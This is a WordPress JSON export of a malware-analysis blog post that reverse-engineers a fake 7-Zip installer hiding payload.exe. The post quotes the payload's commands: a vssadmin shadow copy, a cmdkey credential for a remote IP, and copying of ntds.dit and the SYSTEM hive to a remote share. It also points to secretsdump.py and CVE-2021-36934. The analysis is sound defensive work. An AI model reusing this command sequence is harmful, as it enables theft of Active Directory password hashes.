{"id":883,"date":"2025-07-10T00:36:48","date_gmt":"2025-07-10T00:36:48","guid":{"rendered":"https:\/\/malwrforensics.com\/en\/?p=883"},"modified":"2025-07-10T00:41:34","modified_gmt":"2025-07-10T00:41:34","slug":"use-7-zip-to-extract-a-fake-7-zip-installer","status":"publish","type":"post","link":"https:\/\/malwrforensics.com\/en\/2025\/07\/10\/use-7-zip-to-extract-a-fake-7-zip-installer\/","title":{"rendered":"Using 7-Zip to extract a fake 7-Zip installer"},"content":{"rendered":"\n<p>I stumbled upon an interesting file on  <a href=\"https:\/\/app.any.run\/tasks\/7f03cd5b-ad02-4b3a-871f-c31ac0f5dc15\/\">Any.run<\/a>. The file in question is <a href=\"https:\/\/www.virustotal.com\/gui\/file\/17a5512e09311e10465f432e1a093cd484bbd4b63b3fb25e6fbb1861a2a3520b\">bff1fc0a497f275c6caf0d87eb680dc807639c9e<\/a>. It has the name 7z2409-x64.exe. If we dig a bit through the file, we can easily see that it&#8217;s actually a Nullsoft installer:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"917\" height=\"357\" src=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/image.png\" alt=\"\" class=\"wp-image-884\" srcset=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/image.png 917w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/image-300x117.png 300w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/image-768x299.png 768w\" sizes=\"auto, (max-width: 917px) 100vw, 917px\" \/><\/figure>\n\n\n\n<p>A quick search reveals that one way to extract the files inside is by using 7-Zip. 
Opening it reveals the real 7-Zip and a file called payload.exe.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"357\" height=\"87\" src=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/image-1.png\" alt=\"\" class=\"wp-image-885\" srcset=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/image-1.png 357w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/image-1-300x73.png 300w\" sizes=\"auto, (max-width: 357px) 100vw, 357px\" \/><\/figure>\n\n\n\n<p>Let&#8217;s analyze payload.exe. The first thing we do is check the strings:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"185\" src=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/strings1-1024x185.png\" alt=\"\" class=\"wp-image-886\" srcset=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/strings1-1024x185.png 1024w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/strings1-300x54.png 300w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/strings1-768x139.png 768w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/strings1.png 1332w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Definitely not what you&#8217;d expect to see in a clean file. Let&#8217;s disassemble it and see what&#8217;s going on.<\/p>\n\n\n\n<p>The WinMain function starts with a call to the <a href=\"https:\/\/learn.microsoft.com\/en-us\/cpp\/c-runtime-library\/reference\/system-wsystem?view=msvc-170\">system<\/a> API to execute the command <code>vssadmin create shadow \/for=C: &gt;nul 2&gt;&amp;1<\/code>. This creates a shadow copy of the C: drive. 
This is usually done to make it easier to copy sensitive files that are otherwise locked while in use.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"687\" height=\"216\" src=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/code1.png\" alt=\"\" class=\"wp-image-887\" srcset=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/code1.png 687w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/code1-300x94.png 300w\" sizes=\"auto, (max-width: 687px) 100vw, 687px\" \/><\/figure>\n\n\n\n<p>Let&#8217;s analyze the code further:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"933\" height=\"383\" src=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/code2.png\" alt=\"\" class=\"wp-image-888\" srcset=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/code2.png 933w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/code2-300x123.png 300w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/code2-768x315.png 768w\" sizes=\"auto, (max-width: 933px) 100vw, 933px\" \/><\/figure>\n\n\n\n<p>Our assumption was correct. There are 4 more calls to the system API.<\/p>\n\n\n\n<p>The first one uses cmdkey to store (add) a network credential in the Windows Credential Manager. 
The command that will be executed looks like this:<\/p>\n\n\n\n<p><code>cmdkey \/add:192.76.28.19 \/user:thr34t \/pass:MyThreatPassword123+<\/code><\/p>\n\n\n\n<p>Next, the malware tries to copy the files ntds.dit and SYSTEM to <code>\\\\192.76.29.19\\work\\DC01<\/code> and after that deletes the saved credentials.<\/p>\n\n\n\n<p>A whois lookup for 192.76.28.19 points to a system that appears to belong to the <a href=\"https:\/\/www.ox.ac.uk\/contact-us\" data-type=\"link\" data-id=\"https:\/\/www.ox.ac.uk\/contact-us\">University of Oxford<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"431\" height=\"286\" src=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/whois_ip.png\" alt=\"\" class=\"wp-image-889\" srcset=\"https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/whois_ip.png 431w, https:\/\/malwrforensics.com\/en\/wp-content\/uploads\/2025\/07\/whois_ip-300x199.png 300w\" sizes=\"auto, (max-width: 431px) 100vw, 431px\" \/><\/figure>\n\n\n\n<p>Let&#8217;s see what those files are good for.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>ntds.dit<\/code> is the core database file for <strong>Active Directory Domain Services (AD DS)<\/strong> in Windows Server.<\/li>\n\n\n\n<li>SYSTEM is a registry hive. It holds the boot key needed to decrypt the password hashes stored in ntds.dit.<\/li>\n<\/ul>\n\n\n\n<p>From here it&#8217;s relatively easy to get those hashes. One way is to use <a href=\"https:\/\/github.com\/fortra\/impacket\/blob\/master\/examples\/secretsdump.py\">secretsdump.py<\/a> from Impacket.<\/p>\n\n\n\n<p>Now, you may ask yourself how everyone has access to these files. Usually, regular users don&#8217;t, and that&#8217;s where <a href=\"https:\/\/msrc.microsoft.com\/update-guide\/vulnerability\/CVE-2021-36934\">CVE-2021-36934<\/a> (or another elevation of privilege vulnerability) comes into play. 
That&#8217;s why some detections on VirusTotal have this CVE in the name.<\/p>\n\n\n\n<p>Hopefully you had fun reading this!<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[145,146,38,148,147],"class_list":["post-883","post","type-post","status-publish","format-standard","hentry","category-security","tag-malware-analysis","tag-ntds-dit","tag-reverse-engineering","tag-secretsdump-py","tag-system-registry-hive"],"blocksy_meta":[],"featured_image_urls_v2":{"full":"","thumbnail":"","medium":"","medium_large":"","large":"","1536x1536":"","2048x2048":""},"category_list_v2":"<a href=\"https:\/\/malwrforensics.com\/en\/category\/security\/\" rel=\"category tag\">Security<\/a>","author_info_v2":{"name":"malwrforensics","url":"https:\/\/malwrforensics.com\/en\/author\/u_malwrforensics\/"},"comments_num_v2":"0 comments"}